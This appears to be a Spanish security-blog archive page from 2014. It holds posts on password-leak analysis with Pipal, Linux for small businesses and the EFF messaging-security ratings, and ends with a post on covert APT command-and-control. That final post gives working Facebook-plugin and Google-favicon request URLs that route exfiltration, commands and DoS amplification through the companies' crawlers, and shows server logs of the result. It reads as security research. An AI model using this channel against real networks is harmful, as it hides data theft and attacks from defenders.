The Information Systems and Computer Applications examination covers material that is usually taught in an introductory college-level business information systems course.

Archive for November, 2014

  Analizando un leak de contraseñas con Pipal

Hace unas semanas se publicó un ‘leak’, otro más, con multitud de contraseñas aparentemente asociadas a un servicio web conocido. Ya nos estamos acostumbrando a este tipo de noticias, y esta vez se ha apuntado con el dedo a la todopoderosa Google como fuente de esta publicación, con nada menos que alrededor de 5 millones de usuarios comprometidos.

Desde Google indican que no se trata de un ataque dirigido ni un compromiso de ninguno de los servidores de la empresa, sino que apuntan a que se puede tratar de una recopilación elaborada con mucha paciencia, y que menos de un 2% de las combinaciones de usuario y contraseña podrían haber funcionado. A pesar de ello nunca está de más echar un pequeño vistazo a las credenciales publicadas y, además de comprobar si nosotros o amigos y familiares están comprometidos, poder realizar un pequeño análisis y comprobar el estado de la concienciación en materia de seguridad de las contraseñas.

Para la primera tarea nos ponemos a buscar por el documento de texto y nos quedamos tranquilos tras comprobar que ni nosotros ni ningún conocido aparecen en esta publicación. Si no has podido obtener este ‘leak’ puedes acceder al proyecto Have I been pwned? del investigador de seguridadTroy Hunt, que recopila cuentas de correo comprometidas en este y otros ‘leaks’ importantes, y comprobar tus cuentas de correo.

Para la segunda tarea, vamos a emplear una utilidad que realiza el análisis de forma automática. La utilidad se llama Pipal y ha sido creada por Robin Wood (@digininja) precisamente para esta tarea: analizar los listados de contraseñas obtenidos, en su caso tras realizar las auditorías de seguridad que Robin lleva a cabo durante su trabajo habitual. Como el propio Robin indica “Antes de continuar debo resaltar que lo único que hace esta aplicación es proporcionar las estadísticas e información necesaria para ayudarte a analizar las contraseñas. El verdadero trabajo lo debes realizar tú interpretando los resultados. Yo te doy los números, tú cuentas la historia”.

Veamos como funciona la aplicación y los resultados que nos puede mostrar. Pipal se puede descargar desde github, y es una aplicación en Ruby autocontenida que podemos ejecutar en cualquier instalación estándar de Ruby, sin ningún otro requisito adicional.

$ ./pipal/pipal.rb -?
pipal 3.1 Robin Wood (robin@digi.ninja) (http://digi.ninja)

Usage: pipal [OPTION] ... FILENAME
     --help, -h, -?: show help
     --top, -t X: show the top X results (default 10)
     --output, -o
Advertisements

Rescata un ordenador viejo para tu PyME gracias a Linux

 Bitelia by Aymará Samudio
Rescata un ordenador viejo para tu PyME gracias a LinuxCon la gran cantidad de software libre disponible, y la necesidad de optimizar recursos, las PyMEs se enfrentan a un gran desafío: Elegir la mejor opción que se adapte a sus necesidades.

El software libre es una herramienta formidable para ser utilizada en muchos ámbitos. Uno de ellos, y el que crece con gran fuerza, es en las Pequeñas y Medianas Empresas (PyMEs). Son muchos los desafíos a enfrentar por quienes inician una empresa, el de reducir los costos al mínimo y generar un entorno de trabajo estable y robusto, es de vital importancia para el éxito del emprendimiento. La oferta de opciones es amplia y adaptable a casi todas las necesidades, pero esa misma variedad hace que para quienes recién se inician sea una tarea casi imposible de afrontar. Es por ello que hoy vamos a rescatar un ordenador viejo para tu PyME: crearemos un sistema basado en GNU-Linux con un mínimo consumo de recursos en cuanto a hardware, las configuraciones básicas a tener en cuenta y las aplicaciones elementales para un funcionamiento óptimo de nuestra PyME.

Conocer las necesidades: Casos de Uso

Antes de comenzar debemos preguntarnos qué necesitamos de nuestro sistema, es decir qué uso le daremos, y con qué hardware contamos para ello. Las elecciones que tomaremos a partir de estas dos sencillas preguntas serán las que nos guiarán por todo el proceso y permitirán que construyamos un sistema que cumpla con nuestras expectativas.

Por ejemplo: En un pequeño comercio, quizás contemos con dos PC, una con conexión a internet que utilizaremos para la difusión de los productos en las redes sociales, toma de pedidos on-line, responder correos electrónicos, etc. y otra PC que utilizaremos para el funcionamiento interno, como control de stock, agenda de clientes, facturación, etc. Ambas funcionarán en red y estarán conectadas a la impresora.

PyME

Sistema orientado a la Web

Si tu PyME estará orientada ante todo a las redes sociales y a internet, tal como lo marca la tendencia actual, necesitarás lograr un sistema ultra liviano y con pocas aplicaciones. Paquetes de software ofimático o multimedia probablemente estarán de sobra.

  • Sistema Operativo: Puedes elegir una distribución ultraliviana para comenzar. O bien instalar Chrome OS que es una distribución de código abierto basado en web, SaltOS, o algunos otros sistemas operativos online.
  • Aplicaciones: lo elemental será un navegador, se puede optar los tradicionales Firefox y Chromium, o probar con Midori, un navegador ultraliviano. Necesitaremos además un gestor de correo, y un administrador de tareas, como ToDoist. Para generar facturas podemos servirnos de algunas aplicaciones para facturas online.
  • Almacenamiento en la nube: ya que trabajaremos online, nuestros datos y archivos deberían estar disponibles en la nube y en varios servicios. Jolicloud, Dropbox, Drive, son algunos de los servicios más conocidos
  • Mantenlo mínimo: recuerda que la clave es no sobrecargar el sistema con aplicaciones que no se utilizarán, priorizando aquellas aplicaciones que sirvan para la experiencia web,extensiones para los navegadores, clientes para redes sociales como twitter, etc.

Sistema para uso interno o uso administrativo

A menudo tenemos una PC en desuso que bien podría cumplir la función de uso meramente administrativo: llevar las planillas de stock, agenda de clientes online, documentación interna de la empresa, facturación, etc.
Para este uso, priorizaremos entonces las aplicaciones ofimáticas y de gestión.

  • Sistema Operativo: la mejor opción será aquella que tenga un ciclo de actualización de largo matenimiento, y con un entorno de escritorio sencillo y amigable. Es recomendable alguna de las distribuciones basadas en debian, recomendando especialmente Lubuntu por ser un entorno amigable y funcionar en hardware limitado.
  • Aplicaciones: La mayor parte de las distribuciones incluye por defecto a LibreOffice como paquete ofimático, para sacarle mayor partido es recomendable instalar las extensiones que nos hagan falta. Para gestionar facturas podemos instalar GNUCash, por ejemplo, o confiar en el robusto AbanQ, que cuenta con un sistema completo de ERP (Enterprise Resource Planning).
  • Importante: recuerda hacer un backup de todos los datos en periodos fijos.
  • Configuraciones adicionales: con seguridad será necesario configurar una red pequeña para el uso de la impresora y compartir datos entre dos o más PCs, para ello deberemos instalar y configurar Samba.

El software libre disponible es mucho y variado, con el tiempo y el uso conseguirás las aplicaciones que mejor se adapten a las necesidades de tu emprendimiento. Es así como logras que tu PyME con Linux aproveche mejor los recursos preexistentes y garantice un sistema fiable y robusto para que desarrolles con tranquilidad tus actividades. Lo más importante de todo: hazlo tuyo.


  EFF: WhatsApp y Telegram son más seguras que BBM

EFF: WhatsApp y Telegram son más seguras que BBM

  • La EFF ha realizado un estudio donde se muestra la falta de seguridad en servicios cotidianos
  • Desde correo electrónico a mensajería por móviles, nuestra información está comprometida
  • Ésta es parte de una campaña de concienciación cuyo objetivo es el usuario

La polémica vuelve a la carga. ¿Hay seguridad en los servicios de comunicación y mensajería? Aunque cada día somos más conscientes de que nuestros correos o mensajes podrían estar siendo espiados por distintas compañías la EFF (Electronic Frontier Foundation) ha dejado claro que no, que muy pocos son los servicios que cumplen con el mínimo.

En un estudio desvelado esta misma semana por la EFF se muestra que ni si quiera los servicios más masivos y utilizados por los usuarios, es decir los que ofrece Apple, Google, Facebook o Yahoo cumplen con algunas cuestiones que deberían ser básicas para proteger nuestra información. Entre estas, por ejemplo, se encuentran la encriptación end-to-end es decir, aquella que codifica el mensaje al salir del emisor y solo vuelve a decodificarlo al confirmarse la llegada a su receptor correcto.

La EFF denuncia la falta de seguridad

De hecho, algunos de los servicios más populares carece completamente de encriptación permitiendo que la información sufra de numerosas vulnerabilidades que podrían usarse para robarla. La EFF ha estudiado más de una treintena de servicios, de los cuales algunos se cuentan entre nuestro uso diario. Correo, mensajería, envío de imágenes, servicios de voz, nada se ha escapado al análisis de la EFF. Además, para analizar dichos servicios, en el extenso informe la EFF se ha parado a analizar siete factores principales.

EFFDetalle de algunas de las Apps analizadas. Fuente: EFF.

Entre ellos la capacidad de codificación, la verificación de contactos, si el proveedor se encuentra comprometido o si el código ha sido objeto de una auditoría de seguridad, por ejemplo. Sus conclusiones son claras: aunque creas que la información que estás publicando se encuentra “segura”, aunque tomes medidas para controlar lo que envías, tu información no está a salvo por mucho que te esfuerces. Pero ¿a salvo de quién? Desde hackers con intenciones dañinas a compañías con una ética dudosa, el acceso a tu información aunque resulte difícil es posible.

Las Apps más y menos seguras

Según el análisis las aplicaciones y servicios más seguros son precisamente lo más desconocidos. Entre ellos se encuentran nombres que suenan vagamente como ChatSecure, Cryptocat, Silent Phone, Silent Text o TextSecure. Estos servicios son de uso minoritario precisamente por que suelen emplearse dentro de círculos cerrados, por su complejidad o sencillamente por que la gente aún siendo consciente de la problemática no valora adecuadamente hasta que punto su información está comprometida en las redes

Los servicios más seguros son los más desconocidos para los usuariosDentro del análisis de la EFF algunos de los servicios populares más seguros son los ofrecidos por empresas como Apple. Apple Mail y Messenger continúan entre los mejores aunque ninguno de los dos, afirman desde EFF, superaría una prueba sofisticada de hackeo. Otros como los de Google, Yahoo o Facebook ofrecen medidas generales de seguridad pero fallan en puntos críticos como la ya mentada encriptación “end-to-end” dejando una vulnerabilidad a explotar muy fuerte.

Otro servicios, especialmente los utilizados para comunicarse de manera más “privada” como Snapchat, Secret o Whatsapp, BlackBerry Messenger o Viber fallan precisamente en las mismas cuestiones o incluso en algunas más básicas, haciéndolos más vulnerables si cabe. EFF ha realizado este estudio en su “campaña por la seguridad y una codificación mas práctica” donde quieren poner en evidencia la necesidad de concienciar a los usuarios y desarrollar herramientas que nos den al mismo tiempo comodidad y seguridad. Podéis consultar las aplicaciones revisadas en el catálogo mostrado por la EFF.


APT: bot exfiltration

Dentro del mundo de las amenazas avanzadas persistentes o APTs, juegan un papel muy importante las técnicas utilizadas por los artefactos malware, para comunicarse y exfiltrar información a través de los C2s (Command & Control). En este aspecto existen tantas formas como imaginación pueda aportar el atacante y como protocolos y servicios existan. Un pequeño ejemplo de los “trucos” para enmascarar el tráfico ilegítimo como información aparentemente normal son:

  • Peticiones HTTP a páginas aparentemente lícitas, las cuales han sido crackeadas, albergando código del C2.
  • Sobreutilización del protocolo DNS para exfiltrar y comunicarse con los atacantes.
  • Sobreutilización de Google Calendar.

La lista anterior puede ser tan larga casi como campañas APT han existido y existen. En este post me gustaría aportar una nueva forma de exfiltración en la cual el equipo infectado y el C2 en ningún momento intercambian información directamente, sino que lo hacen a través de la legión de bots que los grandes gigantes de Internet disponen. Estos son Google, Facebook o Twitter entre otros.

¿Para qué sirven o qué función tienen estos bots? En el caso de Facebook, esta compañía dispone de una serie de agentes utilizados para realizar una previsualización del contenido de un enlace cuando se postea un comentario en esta red social. De esta manera, es posible presentar al usuario de una forma más amigable el contenido Web enlazado. Así, cuando el enlace es recibido por Facebook éste “ordena” a sus bots que visiten dicha URL extrayendo información de la web asociada.

El lector ya se habrá dado cuenta que controlando la URL a la cual queremos que los bots se conecten, disponemos de una forma de remitir información a un dominio propiedad del atacante, redirigiendo la petición a través de Facebook. De esta manera, ya tenemos el primer canal de comunicación “Equipo infectado” -> “C2”. Esta petición pasará totalmente desapercibida para los posibles analistas de seguridad del organismo víctima, ya que realmente son peticiones realizadas contra la red social.

El primer impedimento encontrado para ejecutar la redirección fue que necesitaba tener una cuenta de Facebook válida y estar autenticado para poder postear. Revisando un poco más a fondo por la documentación del “Caralibro” encontré la solución para poder postear sin estar autenticado. Esa magia la aportó la sección de “Developers”. A continuación, os dejo la petición GET para controlar los bots de Facebook a vuestro antojo, visitando todo aquello que vosotros les remitáis.

https://www.facebook.com/plugins/comments.php
?api_key=113869198637480
&channel_url=http://static.ak.fbcdn.net/connect/xd_proxy.php?version=3#cb=f10df33f48&
origin=http://developers.facebook.com/f29957fd8&relation=parent.parent&transport=postmessage
&href=DOMINIO A VISITAR
&locale=en_US
&numposts=2
&sdk=joey
&width=500

Un avispado ya se habrá dado cuenta que esto no sólo puede ser utilizado para exfiltrar información sino para por ejemplo realizar ataques de DoS encubiertos o aumentar contadores de visitas. Como ejemplo, os dejo el log de mi apache, tras decirle a Facebook que visite mi web.

66.220.152.118 - - [30/Oct/2014:11:44:23 +0100] "GET /kaka333333339 HTTP/1.1" 404 508 "-"
   "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:16 +0100] "GET / HTTP/1.1" 206 3008 "-"
   "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/btn_3.jpg HTTP/1.1" 206 1227
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
       (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:45:17 +0100] "GET /images/lines-09.jpg HTTP/1.1" 206 654
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/spotlight.jpg HTTP/1.1" 206 2582
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/btn_4.jpg HTTP/1.1" 206 1356
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:45:17 +0100] "GET /images/welcome-18.jpg HTTP/1.1" 206 8889
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/welcome.jpg HTTP/1.1" 206 3987
   "http://miserver.no-ip.org/" "facebookexternalhit/1.1
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.112 - - [30/Oct/2014:11:45:17 +0100] "GET /images/lines-11.jpg HTTP/1.1" 206 654
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.117 - - [30/Oct/2014:11:45:17 +0100] "GET /images/services.jpg HTTP/1.1" 206 2794
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:44:23 +0100] "GET /kaka333333339 HTTP/1.1" 404 508 "-"
    "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:16 +0100] "GET / HTTP/1.1" 206 3008 "-"
   "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/btn_3.jpg HTTP/1.1" 206 1227
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
       (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:45:17 +0100] "GET /images/lines-09.jpg HTTP/1.1" 206 654
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
       (+http://www.facebook.com/externalhit_uatext.php)"

La verdad es que se puede conseguir una buena amplificación, ya que una sola petición a Facebook generó 43 GETs de 10 bots distintos a la web destino. Pero no quiero desviarme del tema, que estamos a APTs.

Ahora que tenemos la forma de exfiltrar necesitamos poder remitir comandos de control a los equipos infectados en la organización víctima. Para esta parte nos van a ayudar los bots de Google, los cuales también podemos controlar para que no sólo visiten lo que nosotros queramos sino que además le remitan por nosotros a los equipos infectados las ordenes a realizar.
Normalmente cuando un C2 quiere ejecutar un comando en la víctima la comunicación no se hace en el sentido C2 -> “equipo infectado” sino al revés, siendo el portador del malware el que inicia comunicación.

Pues bien, Google dispone de una url por la que, dado un dominio, ésta te devuelve el favicon del mismo, lo que resulta perfecto para remitir en el mismo las órdenes a ejecutar en el equipo infectado.

http://www.google.com/s2/favicons?domain=DOMINIO-A-VISITAR

Una vez ejecutada, podemos ver en el log del C2 la siguiente petición realizada por el bot:

66.249.93.181 - - [31/Oct/2014:13:36:22 +0100] "GET / HTTP/1.1" 200 2961 "-"
   "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google favicon"
66.249.93.178 - - [31/Oct/2014:13:36:23 +0100] "GET /favicon.ico HTTP/1.1" 200 1703 "-"
   "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google favicon"

En este favicon podemos, por ejemplo con técnicas estenográficas, incluir la información de control remitida al equipo infectado. Así pues, tenemos establecida una comunicación bidireccional con los C2 sin establecer en ningún momento un canal directo entre equipos infectados y equipos de mando y control, perfecto para pasar desapercibidos.